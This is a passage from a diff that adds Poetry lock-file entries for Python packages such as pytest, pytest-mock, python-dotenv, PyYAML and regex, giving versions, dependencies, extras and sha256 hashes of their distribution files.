+ {file = "pytest-7.4.4-py3-none-any.whl", hash = "sha256:b090cdf5ed60bf4c45261be03239c2c1c22df034fbffe691abe93cd80cea01d8"},
+ {file = "pytest-7.4.4.tar.gz", hash = "sha256:2cf0005922c6ace4a3e2ec8b4080eb0d9753fdc93107415332f50ce9e7994280"},
+]
+
+[package.dependencies]
+colorama = {version = "*", markers = "sys_platform == \"win32\""}
+exceptiongroup = {version = ">=1.0.0rc8", markers = "python_version < \"3.11\""}
+iniconfig = "*"
+packaging = "*"
+pluggy = ">=0.12,<2.0"
+tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""}
+
+[package.extras]
+testing = ["argcomplete", "attrs (>=19.2.0)", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "setuptools", "xmlschema"]
+
+[[package]]
+name = "pytest-env"
+version = "0.8.2"
+description = "py.test plugin that allows you to add environment variables."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "pytest_env-0.8.2-py3-none-any.whl", hash = "sha256:5e533273f4d9e6a41c3a3120e0c7944aae5674fa773b329f00a5eb1f23c53a38"},
+ {file = "pytest_env-0.8.2.tar.gz", hash = "sha256:baed9b3b6bae77bd75b9238e0ed1ee6903a42806ae9d6aeffb8754cd5584d4ff"},
+]
+
+[package.dependencies]
+pytest = ">=7.3.1"
+
+[package.extras]
+test = ["coverage (>=7.2.7)", "pytest-mock (>=3.10)"]
+
+[[package]]
+name = "pytest-mock"
+version = "3.14.0"
+description = "Thin-wrapper around the mock package for easier use with pytest"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pytest-mock-3.14.0.tar.gz", hash = "sha256:2719255a1efeceadbc056d6bf3df3d1c5015530fb40cf347c0f9afac88410bd0"},
+ {file = "pytest_mock-3.14.0-py3-none-any.whl", hash = "sha256:0b72c38033392a5f4621342fe11e9219ac11ec9d375f8e2a0c164539e0d70f6f"},
+]
+
+[package.dependencies]
+pytest = ">=6.2.5"
+
+[package.extras]
+dev = ["pre-commit", "pytest-asyncio", "tox"]
+
+[[package]]
+name = "python-dateutil"
+version = "2.9.0.post0"
+description = "Extensions to the standard Python datetime module"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
+files = [
+ {file = "python-dateutil-2.9.0.post0.tar.gz", hash = "sha256:37dd54208da7e1cd875388217d5e00ebd4179249f90fb72437e91a35459a0ad3"},
+ {file = "python_dateutil-2.9.0.post0-py2.py3-none-any.whl", hash = "sha256:a8b2bc7bffae282281c8140a97d3aa9c14da0b136dfe83f850eea9a5f7470427"},
+]
+
+[package.dependencies]
+six = ">=1.5"
+
+[[package]]
+name = "python-dotenv"
+version = "1.0.1"
+description = "Read key-value pairs from a .env file and set them as environment variables"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "python-dotenv-1.0.1.tar.gz", hash = "sha256:e324ee90a023d808f1959c46bcbc04446a10ced277783dc6ee09987c37ec10ca"},
+ {file = "python_dotenv-1.0.1-py3-none-any.whl", hash = "sha256:f7b63ef50f1b690dddf550d03497b66d609393b40b564ed0d674909a68ebf16a"},
+]
+
+[package.extras]
+cli = ["click (>=5.0)"]
+
+[[package]]
+name = "pytz"
+version = "2024.2"
+description = "World timezone definitions, modern and historical"
+optional = false
+python-versions = "*"
+files = [
+ {file = "pytz-2024.2-py2.py3-none-any.whl", hash = "sha256:31c7c1817eb7fae7ca4b8c7ee50c72f93aa2dd863de768e1ef4245d426aa0725"},
+ {file = "pytz-2024.2.tar.gz", hash = "sha256:2aa355083c50a0f93fa581709deac0c9ad65cca8a9e9beac660adcbd493c798a"},
+]
+
+[[package]]
+name = "pyyaml"
+version = "6.0.2"
+description = "YAML parser and emitter for Python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "PyYAML-6.0.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0a9a2848a5b7feac301353437eb7d5957887edbf81d56e903999a75a3d743086"},
+ {file = "PyYAML-6.0.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:29717114e51c84ddfba879543fb232a6ed60086602313ca38cce623c1d62cfbf"},
+ {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8824b5a04a04a047e72eea5cec3bc266db09e35de6bdfe34c9436ac5ee27d237"},
+ {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7c36280e6fb8385e520936c3cb3b8042851904eba0e58d277dca80a5cfed590b"},
+ {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ec031d5d2feb36d1d1a24380e4db6d43695f3748343d99434e6f5f9156aaa2ed"},
+ {file = "PyYAML-6.0.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:936d68689298c36b53b29f23c6dbb74de12b4ac12ca6cfe0e047bedceea56180"},
+ {file = "PyYAML-6.0.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:23502f431948090f597378482b4812b0caae32c22213aecf3b55325e049a6c68"},
+ {file = "PyYAML-6.0.2-cp310-cp310-win32.whl", hash = "sha256:2e99c6826ffa974fe6e27cdb5ed0021786b03fc98e5ee3c5bfe1fd5015f42b99"},
+ {file = "PyYAML-6.0.2-cp310-cp310-win_amd64.whl", hash = "sha256:a4d3091415f010369ae4ed1fc6b79def9416358877534caf6a0fdd2146c87a3e"},
+ {file = "PyYAML-6.0.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:cc1c1159b3d456576af7a3e4d1ba7e6924cb39de8f67111c735f6fc832082774"},
+ {file = "PyYAML-6.0.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1e2120ef853f59c7419231f3bf4e7021f1b936f6ebd222406c3b60212205d2ee"},
+ {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5d225db5a45f21e78dd9358e58a98702a0302f2659a3c6cd320564b75b86f47c"},
+ {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5ac9328ec4831237bec75defaf839f7d4564be1e6b25ac710bd1a96321cc8317"},
+ {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3ad2a3decf9aaba3d29c8f537ac4b243e36bef957511b4766cb0057d32b0be85"},
+ {file = "PyYAML-6.0.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ff3824dc5261f50c9b0dfb3be22b4567a6f938ccce4587b38952d85fd9e9afe4"},
+ {file = "PyYAML-6.0.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:797b4f722ffa07cc8d62053e4cff1486fa6dc094105d13fea7b1de7d8bf71c9e"},
+ {file = "PyYAML-6.0.2-cp311-cp311-win32.whl", hash = "sha256:11d8f3dd2b9c1207dcaf2ee0bbbfd5991f571186ec9cc78427ba5bd32afae4b5"},
+ {file = "PyYAML-6.0.2-cp311-cp311-win_amd64.whl", hash = "sha256:e10ce637b18caea04431ce14fabcf5c64a1c61ec9c56b071a4b7ca131ca52d44"},
+ {file = "PyYAML-6.0.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:c70c95198c015b85feafc136515252a261a84561b7b1d51e3384e0655ddf25ab"},
+ {file = "PyYAML-6.0.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:ce826d6ef20b1bc864f0a68340c8b3287705cae2f8b4b1d932177dcc76721725"},
+ {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1f71ea527786de97d1a0cc0eacd1defc0985dcf6b3f17bb77dcfc8c34bec4dc5"},
+ {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9b22676e8097e9e22e36d6b7bda33190d0d400f345f23d4065d48f4ca7ae0425"},
+ {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:80bab7bfc629882493af4aa31a4cfa43a4c57c83813253626916b8c7ada83476"},
+ {file = "PyYAML-6.0.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:0833f8694549e586547b576dcfaba4a6b55b9e96098b36cdc7ebefe667dfed48"},
+ {file = "PyYAML-6.0.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8b9c7197f7cb2738065c481a0461e50ad02f18c78cd75775628afb4d7137fb3b"},
+ {file = "PyYAML-6.0.2-cp312-cp312-win32.whl", hash = "sha256:ef6107725bd54b262d6dedcc2af448a266975032bc85ef0172c5f059da6325b4"},
+ {file = "PyYAML-6.0.2-cp312-cp312-win_amd64.whl", hash = "sha256:7e7401d0de89a9a855c839bc697c079a4af81cf878373abd7dc625847d25cbd8"},
+ {file = "PyYAML-6.0.2-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:efdca5630322a10774e8e98e1af481aad470dd62c3170801852d752aa7a783ba"},
+ {file = "PyYAML-6.0.2-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:50187695423ffe49e2deacb8cd10510bc361faac997de9efef88badc3bb9e2d1"},
+ {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0ffe8360bab4910ef1b9e87fb812d8bc0a308b0d0eef8c8f44e0254ab3b07133"},
+ {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:17e311b6c678207928d649faa7cb0d7b4c26a0ba73d41e99c4fff6b6c3276484"},
+ {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:70b189594dbe54f75ab3a1acec5f1e3faa7e8cf2f1e08d9b561cb41b845f69d5"},
+ {file = "PyYAML-6.0.2-cp313-cp313-musllinux_1_1_aarch64.whl", hash = "sha256:41e4e3953a79407c794916fa277a82531dd93aad34e29c2a514c2c0c5fe971cc"},
+ {file = "PyYAML-6.0.2-cp313-cp313-musllinux_1_1_x86_64.whl", hash = "sha256:68ccc6023a3400877818152ad9a1033e3db8625d899c72eacb5a668902e4d652"},
+ {file = "PyYAML-6.0.2-cp313-cp313-win32.whl", hash = "sha256:bc2fa7c6b47d6bc618dd7fb02ef6fdedb1090ec036abab80d4681424b84c1183"},
+ {file = "PyYAML-6.0.2-cp313-cp313-win_amd64.whl", hash = "sha256:8388ee1976c416731879ac16da0aff3f63b286ffdd57cdeb95f3f2e085687563"},
+ {file = "PyYAML-6.0.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:24471b829b3bf607e04e88d79542a9d48bb037c2267d7927a874e6c205ca7e9a"},
+ {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d7fded462629cfa4b685c5416b949ebad6cec74af5e2d42905d41e257e0869f5"},
+ {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d84a1718ee396f54f3a086ea0a66d8e552b2ab2017ef8b420e92edbc841c352d"},
+ {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9056c1ecd25795207ad294bcf39f2db3d845767be0ea6e6a34d856f006006083"},
+ {file = "PyYAML-6.0.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:82d09873e40955485746739bcb8b4586983670466c23382c19cffecbf1fd8706"},
+ {file = "PyYAML-6.0.2-cp38-cp38-win32.whl", hash = "sha256:43fa96a3ca0d6b1812e01ced1044a003533c47f6ee8aca31724f78e93ccc089a"},
+ {file = "PyYAML-6.0.2-cp38-cp38-win_amd64.whl", hash = "sha256:01179a4a8559ab5de078078f37e5c1a30d76bb88519906844fd7bdea1b7729ff"},
+ {file = "PyYAML-6.0.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:688ba32a1cffef67fd2e9398a2efebaea461578b0923624778664cc1c914db5d"},
+ {file = "PyYAML-6.0.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:a8786accb172bd8afb8be14490a16625cbc387036876ab6ba70912730faf8e1f"},
+ {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d8e03406cac8513435335dbab54c0d385e4a49e4945d2909a581c83647ca0290"},
+ {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f753120cb8181e736c57ef7636e83f31b9c0d1722c516f7e86cf15b7aa57ff12"},
+ {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3b1fdb9dc17f5a7677423d508ab4f243a726dea51fa5e70992e59a7411c89d19"},
+ {file = "PyYAML-6.0.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:0b69e4ce7a131fe56b7e4d770c67429700908fc0752af059838b1cfb41960e4e"},
+ {file = "PyYAML-6.0.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:a9f8c2e67970f13b16084e04f134610fd1d374bf477b17ec1599185cf611d725"},
+ {file = "PyYAML-6.0.2-cp39-cp39-win32.whl", hash = "sha256:6395c297d42274772abc367baaa79683958044e5d3835486c16da75d2a694631"},
+ {file = "PyYAML-6.0.2-cp39-cp39-win_amd64.whl", hash = "sha256:39693e1f8320ae4f43943590b49779ffb98acb81f788220ea932a6b6c51004d8"},
+ {file = "pyyaml-6.0.2.tar.gz", hash = "sha256:d584d9ec91ad65861cc08d42e834324ef890a082e591037abe114850ff7bbc3e"},
+]
+
+[[package]]
+name = "pyyaml-env-tag"
+version = "0.1"
+description = "A custom YAML tag for referencing environment variables in YAML files. "
+optional = false
+python-versions = ">=3.6"
+files = [
+ {file = "pyyaml_env_tag-0.1-py3-none-any.whl", hash = "sha256:af31106dec8a4d68c60207c1886031cbf839b68aa7abccdb19868200532c2069"},
+ {file = "pyyaml_env_tag-0.1.tar.gz", hash = "sha256:70092675bda14fdec33b31ba77e7543de9ddc88f2e5b99160396572d11525bdb"},
+]
+
+[package.dependencies]
+pyyaml = "*"
+
+[[package]]
+name = "regex"
+version = "2024.11.6"
+description = "Alternative regular expression module, to replace re."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "regex-2024.11.6-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:ff590880083d60acc0433f9c3f713c51f7ac6ebb9adf889c79a261ecf541aa91"},
+ {file = "regex-2024.11.6-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:658f90550f38270639e83ce492f27d2c8d2cd63805c65a13a14d36ca126753f0"},
+ {file = "regex-2024.11.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:164d8b7b3b4bcb2068b97428060b2a53be050085ef94eca7f240e7947f1b080e"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d3660c82f209655a06b587d55e723f0b813d3a7db2e32e5e7dc64ac2a9e86fde"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d22326fcdef5e08c154280b71163ced384b428343ae16a5ab2b3354aed12436e"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f1ac758ef6aebfc8943560194e9fd0fa18bcb34d89fd8bd2af18183afd8da3a2"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:997d6a487ff00807ba810e0f8332c18b4eb8d29463cfb7c820dc4b6e7562d0cf"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:02a02d2bb04fec86ad61f3ea7f49c015a0681bf76abb9857f945d26159d2968c"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f02f93b92358ee3f78660e43b4b0091229260c5d5c408d17d60bf26b6c900e86"},
+ {file = "regex-2024.11.6-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:06eb1be98df10e81ebaded73fcd51989dcf534e3c753466e4b60c4697a003b67"},
+ {file = "regex-2024.11.6-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:040df6fe1a5504eb0f04f048e6d09cd7c7110fef851d7c567a6b6e09942feb7d"},
+ {file = "regex-2024.11.6-cp310-cp310-musllinux_1_2_ppc64le.whl", hash = "sha256:fdabbfc59f2c6edba2a6622c647b716e34e8e3867e0ab975412c5c2f79b82da2"},
+ {file = "regex-2024.11.6-cp310-cp310-musllinux_1_2_s390x.whl", hash = "sha256:8447d2d39b5abe381419319f942de20b7ecd60ce86f16a23b0698f22e1b70008"},
+ {file = "regex-2024.11.6-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:da8f5fc57d1933de22a9e23eec290a0d8a5927a5370d24bda9a6abe50683fe62"},
+ {file = "regex-2024.11.6-cp310-cp310-win32.whl", hash = "sha256:b489578720afb782f6ccf2840920f3a32e31ba28a4b162e13900c3e6bd3f930e"},
+ {file = "regex-2024.11.6-cp310-cp310-win_amd64.whl", hash = "sha256:5071b2093e793357c9d8b2929dfc13ac5f0a6c650559503bb81189d0a3814519"},
+ {file = "regex-2024.11.6-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5478c6962ad548b54a591778e93cd7c456a7a29f8eca9c49e4f9a806dcc5d638"},
+ {file = "regex-2024.11.6-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:2c89a8cc122b25ce6945f0423dc1352cb9593c68abd19223eebbd4e56612c5b7"},
+ {file = "regex-2024.11.6-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:94d87b689cdd831934fa3ce16cc15cd65748e6d689f5d2b8f4f4df2065c9fa20"},
+ {file = "regex-2024.11.6-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1062b39a0a2b75a9c694f7a08e7183a80c63c0d62b301418ffd9c35f55aaa114"},
+ {file = "regex-2024.11.6-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:167ed4852351d8a750da48712c3930b031f6efdaa0f22fa1933716bfcd6bf4a3"},
+ {file = "regex-2024.11.6-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2d548dafee61f06ebdb584080621f3e0c23fff312f0de1afc776e2a2ba99a74f"},
+ {file = "regex-2024.11.6-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f2a19f302cd1ce5dd01a9099aaa19cae6173306d1302a43b627f62e21cf18ac0"},
+ {file = "regex-2024.11.6-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bec9931dfb61ddd8ef2ebc05646293812cb6b16b60cf7c9511a832b6f1854b55"},
+ {file = "regex-2024.11.6-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:9714398225f299aa85267fd222f7142fcb5c769e73d7733344efc46f2ef5cf89"},
+ {file = "regex-2024.11.6-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:202eb32e89f60fc147a41e55cb086db2a3f8cb82f9a9a88440dcfc5d37faae8d"},
+ {file = "regex-2024.11.6-cp311-cp311-musllinux_1_2_ppc64le.whl", hash = "sha256:4181b814e56078e9b00427ca358ec44333765f5ca1b45597ec7446d3a1ef6e34"},
+ {file = "regex-2024.11.6-cp311-cp311-musllinux_1_2_s390x.whl", hash = "sha256:068376da5a7e4da51968ce4c122a7cd31afaaec4fccc7856c92f63876e57b51d"},
+ {file = "regex-2024.11.6-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:ac10f2c4184420d881a3475fb2c6f4d95d53a8d50209a2500723d831036f7c45"},
+ {file = "regex-2024.11.6-cp311-cp311-win32.whl", hash = "sha256:c36f9b6f5f8649bb251a5f3f66564438977b7ef8386a52460ae77e6070d309d9"},
+ {file = "regex-2024.11.6-cp311-cp311-win_amd64.whl", hash = "sha256:02e28184be537f0e75c1f9b2f8847dc51e08e6e171c6bde130b2687e0c33cf60"},
+ {file = "regex-2024.11.6-cp312-cp312-macosx_10_13_universal2.whl", hash = "sha256:52fb28f528778f184f870b7cf8f225f5eef0a8f6e3778529bdd40c7b3920796a"},
+ {file = "regex-2024.11.6-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:fdd6028445d2460f33136c55eeb1f601ab06d74cb3347132e1c24250187500d9"},
+ {file = "regex-2024.11.6-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:805e6b60c54bf766b251e94526ebad60b7de0c70f70a4e6210ee2891acb70bf2"},
+ {file = "regex-2024.11.6-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b85c2530be953a890eaffde05485238f07029600e8f098cdf1848d414a8b45e4"},
+ {file = "regex-2024.11.6-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:bb26437975da7dc36b7efad18aa9dd4ea569d2357ae6b783bf1118dabd9ea577"},
+ {file = "regex-2024.11.6-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:abfa5080c374a76a251ba60683242bc17eeb2c9818d0d30117b4486be10c59d3"},
+ {file = "regex-2024.11.6-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:70b7fa6606c2881c1db9479b0eaa11ed5dfa11c8d60a474ff0e095099f39d98e"},
+ {file = "regex-2024.11.6-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0c32f75920cf99fe6b6c539c399a4a128452eaf1af27f39bce8909c9a3fd8cbe"},
+ {file = "regex-2024.11.6-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:982e6d21414e78e1f51cf595d7f321dcd14de1f2881c5dc6a6e23bbbbd68435e"},
+ {file = "regex-2024.11.6-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:a7c2155f790e2fb448faed6dd241386719802296ec588a8b9051c1f5c481bc29"},
+ {file = "regex-2024.11.6-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:149f5008d286636e48cd0b1dd65018548944e495b0265b45e1bffecce1ef7f39"},
+ {file = "regex-2024.11.6-cp312-cp312-musllinux_1_2_s390x.whl", hash = "sha256:e5364a4502efca094731680e80009632ad6624084aff9a23ce8c8c6820de3e51"},
+ {file = "regex-2024.11.6-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:0a86e7eeca091c09e021db8eb72d54751e527fa47b8d5787caf96d9831bd02ad"},
+ {file = "regex-2024.11.6-cp312-cp312-win32.whl", hash = "sha256:32f9a4c643baad4efa81d549c2aadefaeba12249b2adc5af541759237eee1c54"},
+ {file = "regex-2024.11.6-cp312-cp312-win_amd64.whl", hash = "sha256:a93c194e2df18f7d264092dc8539b8ffb86b45b899ab976aa15d48214138e81b"},
+ {file = "regex-2024.11.6-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:a6ba92c0bcdf96cbf43a12c717eae4bc98325ca3730f6b130ffa2e3c3c723d84"},
+ {file = "regex-2024.11.6-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:525eab0b789891ac3be914d36893bdf972d483fe66551f79d3e27146191a37d4"},
+ {file = "regex-2024.11.6-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:086a27a0b4ca227941700e0b31425e7a28ef1ae8e5e05a33826e17e47fbfdba0"},
+ {file = "regex-2024.11.6-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bde01f35767c4a7899b7eb6e823b125a64de314a8ee9791367c9a34d56af18d0"},
+ {file = "regex-2024.11.6-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b583904576650166b3d920d2bcce13971f6f9e9a396c673187f49811b2769dc7"},
+ {file = "regex-2024.11.6-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1c4de13f06a0d54fa0d5ab1b7138bfa0d883220965a29616e3ea61b35d5f5fc7"},
+ {file = "regex-2024.11.6-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3cde6e9f2580eb1665965ce9bf17ff4952f34f5b126beb509fee8f4e994f143c"},
+ {file = "regex-2024.11.6-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0d7f453dca13f40a02b79636a339c5b62b670141e63efd511d3f8f73fba162b3"},
+ {file = "regex-2024.11.6-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:59dfe1ed21aea057a65c6b586afd2a945de04fc7db3de0a6e3ed5397ad491b07"},
+ {file = "regex-2024.11.6-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:b97c1e0bd37c5cd7902e65f410779d39eeda155800b65fc4d04cc432efa9bc6e"},
+ {file = "regex-2024.11.6-cp313-cp313-musllinux_1_2_ppc64le.whl", hash = "sha256:f9d1e379028e0fc2ae3654bac3cbbef81bf3fd571272a42d56c24007979bafb6"},
+ {file = "regex-2024.11.6-cp313-cp313-musllinux_1_2_s390x.whl", hash = "sha256:13291b39131e2d002a7940fb176e120bec5145f3aeb7621be6534e46251912c4"},
+ {file = "regex-2024.11.6-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:4f51f88c126370dcec4908576c5a627220da6c09d0bff31cfa89f2523843316d"},
+ {file = "regex-2024.11.6-cp313-cp313-win32.whl", hash = "sha256:63b13cfd72e9601125027202cad74995ab26921d8cd935c25f09c630436348ff"},
+ {file = "regex-2024.11.6-cp313-cp313-win_amd64.whl", hash = "sha256:2b3361af3198667e99927da8b84c1b010752fa4b1115ee30beaa332cabc3ef1a"},
+ {file = "regex-2024.11.6-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:3a51ccc315653ba012774efca4f23d1d2a8a8f278a6072e29c7147eee7da446b"},
+ {file = "regex-2024.11.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ad182d02e40de7459b73155deb8996bbd8e96852267879396fb274e8700190e3"},
+ {file = "regex-2024.11.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:ba9b72e5643641b7d41fa1f6d5abda2c9a263ae835b917348fc3c928182ad467"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:40291b1b89ca6ad8d3f2b82782cc33807f1406cf68c8d440861da6304d8ffbbd"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:cdf58d0e516ee426a48f7b2c03a332a4114420716d55769ff7108c37a09951bf"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a36fdf2af13c2b14738f6e973aba563623cb77d753bbbd8d414d18bfaa3105dd"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d1cee317bfc014c2419a76bcc87f071405e3966da434e03e13beb45f8aced1a6"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:50153825ee016b91549962f970d6a4442fa106832e14c918acd1c8e479916c4f"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:ea1bfda2f7162605f6e8178223576856b3d791109f15ea99a9f95c16a7636fb5"},
+ {file = "regex-2024.11.6-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:df951c5f4a1b1910f1a99ff42c473ff60f8225baa1cdd3539fe2819d9543e9df"},
+ {file = "regex-2024.11.6-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:072623554418a9911446278f16ecb398fb3b540147a7828c06e2011fa531e773"},
+ {file = "regex-2024.11.6-cp38-cp38-musllinux_1_2_ppc64le.whl", hash = "sha256:f654882311409afb1d780b940234208a252322c24a93b442ca714d119e68086c"},
+ {file = "regex-2024.11.6-cp38-cp38-musllinux_1_2_s390x.whl", hash = "sha256:89d75e7293d2b3e674db7d4d9b1bee7f8f3d1609428e293771d1a962617150cc"},
+ {file = "regex-2024.11.6-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:f65557897fc977a44ab205ea871b690adaef6b9da6afda4790a2484b04293a5f"},
+ {file = "regex-2024.11.6-cp38-cp38-win32.whl", hash = "sha256:6f44ec28b1f858c98d3036ad5d7d0bfc568bdd7a74f9c24e25f41ef1ebfd81a4"},
+ {file = "regex-2024.11.6-cp38-cp38-win_amd64.whl", hash = "sha256:bb8f74f2f10dbf13a0be8de623ba4f9491faf58c24064f32b65679b021ed0001"},
+ {file = "regex-2024.11.6-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:5704e174f8ccab2026bd2f1ab6c510345ae8eac818b613d7d73e785f1310f839"},
